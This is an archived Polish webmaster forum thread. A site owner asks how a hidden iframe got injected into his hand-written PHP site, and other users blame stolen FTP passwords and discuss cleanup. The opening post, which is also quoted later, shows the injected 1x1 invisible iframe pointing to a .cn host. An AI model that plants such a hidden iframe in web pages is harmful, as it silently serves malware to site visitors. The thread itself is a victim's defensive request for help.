Skocz do zawartości

Wirus dolepił IFRAME'a


Winston

Rekomendowane odpowiedzi

Do jednej z moich stron jakieś paskudztwo dokleiło IFRAME (najpewniej ze szkodliwym kodem):

<iframe src="https://mixante.cn/in.cgi?income55" width=1 height=1 style="visibility: hidden"></iframe>

Zorientowałem się jak po dodaniu strony do jednego z katalogów dostałem info o usunięciu z powodu wykrycia wirusa. Pytanie - jak to paskudztwo przylazło? Używam Total Commandera (z zapamiętanymi hasłami, tak - wiem, wiem), ale ogólnie dbam o czystość maszyny, którą używam. Poza tym sprawdziłem pozostałe strony, do których mam zapisane hasła i są czyste. Ta strona akurat za to jako jedyna stoi na serwerze w STREFA.pl.

Wie ktoś w jaki sposób to świństwo się rozprzestrzenia?

Aha, strona ta nie jest na żadnym CMSie, tylko używa prostego, autorskiego skryptu PHP.

Odnośnik do komentarza
Udostępnij na innych stronach

  • Odpowiedzi 38
  • Dodano
  • Ostatniej odpowiedzi
  • 3 tygodnie później...

Jeśli strona jest postawiona np. na home.pl albo stworzyłeś na FTP-ie folder TMP, możliwe, że znajdziesz odpowiedź tutaj. Niektórym z szukających na pewno pomoże, innym życzę powodzenia.

Do jednej z moich stron jakieś paskudztwo dokleiło IFRAME (najpewniej ze szkodliwym kodem):

<iframe src="https://mixante.cn/in.cgi?income55" width=1 height=1 style="visibility: hidden"></iframe>

Zorientowałem się jak po dodaniu strony do jednego z katalogów dostałem info o usunięciu z powodu wykrycia wirusa. Pytanie - jak to paskudztwo przylazło? Używam Total Commandera (z zapamiętanymi hasłami, tak - wiem, wiem), ale ogólnie dbam o czystość maszyny, którą używam. Poza tym sprawdziłem pozostałe strony, do których mam zapisane hasła i są czyste. Ta strona akurat za to jako jedyna stoi na serwerze w STREFA.pl.

Wie ktoś w jaki sposób to świństwo się rozprzestrzenia?

Aha, strona ta nie jest na żadnym CMSie, tylko używa prostego, autorskiego skryptu PHP.

Odnośnik do komentarza
Udostępnij na innych stronach

  • 2 tygodnie później...
Nie użwajcie Total Commandera do przesyłania danych przez FTP! Ściągnijcie Filezilla FTP Client lub inny program.

Ja używałem GlobalScope i niestety też mnie to zaatakowało, więc nie tylko TC... przeskanuj dobrze komputer antywirusem i antyspywarem

Odnośnik do komentarza
Udostępnij na innych stronach

  • 3 tygodnie później...
Jak wygląda ten syf co się dolepia ? Napisze skrypt do kasowania tego g. ale musze wiedzieć jakie przyjmuje postacie... skrypt może wywalać po prostu wszystkie iframe, lub ramki z "width=1 height=1", ale nie wiem czy zawsze dolepia się taki kod.

skryptem raczej nie pójdzie...

miałem tan atak w piątek i oprócz doklejania ifarme skasowało mi kilka ostatnich linijek PHP'a ;)

Zapraszam na Crossweb.pl - wszystie ciekawe barcampy i konferencje w jedym miejscu.

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności